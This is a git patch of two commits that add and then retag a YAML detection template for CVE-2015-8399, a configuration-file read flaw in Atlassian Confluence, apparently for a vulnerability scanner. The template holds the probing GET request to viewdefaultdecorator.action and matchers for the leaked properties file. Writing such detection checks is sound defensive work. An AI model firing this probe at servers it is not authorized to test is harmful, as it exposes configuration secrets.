From 8575e242340e40e7ebc3b7303ec2a97624c143c7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 7 Apr 2021 01:07:06 +0530 Subject: [PATCH 1/2] Create CVE-2015-8399.yaml --- cves/2015/CVE-2015-8399.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2015/CVE-2015-8399.yaml diff --git a/cves/2015/CVE-2015-8399.yaml b/cves/2015/CVE-2015-8399.yaml new file mode 100644 index 0000000000..42d952ba5c --- /dev/null +++ b/cves/2015/CVE-2015-8399.yaml @@ -0,0 +1,25 @@ +id: CVE-2015-8399 +info: + author: princechaddha + name: Atlassian Confluence configuration files read + severity: medium + description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. + reference: https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro + tags: cve,cve2015,atlassian,confluence,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName" + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "confluence-init.properties" + - "View Default Decorator" + condition: and + part: body From 51ae3a6d1ff3f7e8378782c14a98a50c90aa5a42 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 21 Apr 2021 23:55:23 +0530 Subject: [PATCH 2/2] Update CVE-2015-8399.yaml --- cves/2015/CVE-2015-8399.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-8399.yaml b/cves/2015/CVE-2015-8399.yaml index 42d952ba5c..dbe4e9c097 100644 --- a/cves/2015/CVE-2015-8399.yaml +++ b/cves/2015/CVE-2015-8399.yaml @@ -5,7 +5,7 @@ info: severity: medium description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. reference: https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro - tags: cve,cve2015,atlassian,confluence,lfi + tags: cve,cve2015,atlassian,confluence requests: - method: GET